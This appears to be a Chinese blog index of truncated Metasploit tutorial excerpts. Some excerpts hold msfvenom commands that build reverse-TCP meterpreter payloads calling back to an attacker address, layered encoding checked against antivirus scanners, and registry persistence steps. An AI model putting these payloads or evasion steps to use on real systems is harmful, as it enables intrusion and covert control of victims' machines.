前提条件 windows 目标机器安装 office(以 office 2007 为例) 下载地址:https://pan.baidu.com/s/18fE7oGUwxDwi9P_2GdQtHA?pwd=q5ew Windows 安装 office 2007 解压,运行 setup.exe,输入激活码,其余默认即可 Msfvenom 生成 vba …
在线杀软检测:virscan.com 混合编码 混合多次编码 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.225.128 lport=4444 -b "\x00" -e x86/shikata_ga_nai…
Windows 恶意软件 msfvenom 介绍 msfvenom 是 msfpayload 和 msfencode 的结合,可以利用其生成木马程序,在目标机器上执行,在本地监听上线。 msfvenom 使用 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp …
注册表权限驻留 meterpreter getshell 略 meterpreter windows persistence bg 挂起 session show payload 查看可用 payloads use exploit/windows/local/persistence 切换 payload show options 查看参数 设置参数…
Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后得攻击载荷使用,攻击载荷在溢出攻击成功以后会返回一个控制通道。 使用它作为攻击载荷能够获得目标系统的一个 Meterpreter Shell 链接。 Meterpreter Shell 作为渗透模块有很多有用的功能,比如添加用户、隐藏文件、打开 shell、获取…
简介 这是个专门匹配 msf 演示的 Linux 操作系统,暴露了很多高危端口,也存在一些高危漏洞。 下载地址 https://pan.baidu.com/s/1shixJeI1Ca4D0WpI5GUV8w?pwd=sfk5 下载后是个压缩包,直接解压,使用 vmware 打开即可 默认的用户名密码: msfadmin/msfadmin 使用 su…
介绍 永恒之蓝是2017年4月14日晚黑客团体Shadow Brokers公布的一大批网络攻击工具其中的一个。是利用 Windows 系统的 SMB(Server Message Book 网络协议) 漏洞可以获取系统最高权限。 5 月 12 日,不法分子通过改造“永恒之蓝”制作了 wannacry 勒索病毒,英俄、欧洲以及中国多个高校内网、大型企…
这篇文章没有摘要
Rank 在 msf 中是可靠性的等级划分: Rank Description Excellent 这个漏洞永远不会使服务器崩溃。是最可靠的。如 SQL 这与,CMD 执行,RFI,LEI 等情况。没有典型的内存破坏的漏洞应该给 rank,除非有特殊情况。 Great 该漏洞利用程序有一个默认的目标系统,并且可以自动检测适当的目标系统,或者在目标服…
help 帮助 show 用于来展示可用模块。有效参数:all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options search 用于模糊搜索相关模块(已知一个漏洞,查看 msf 中是否有相关模块),可以根据漏洞名、路径、平台、类型等 search…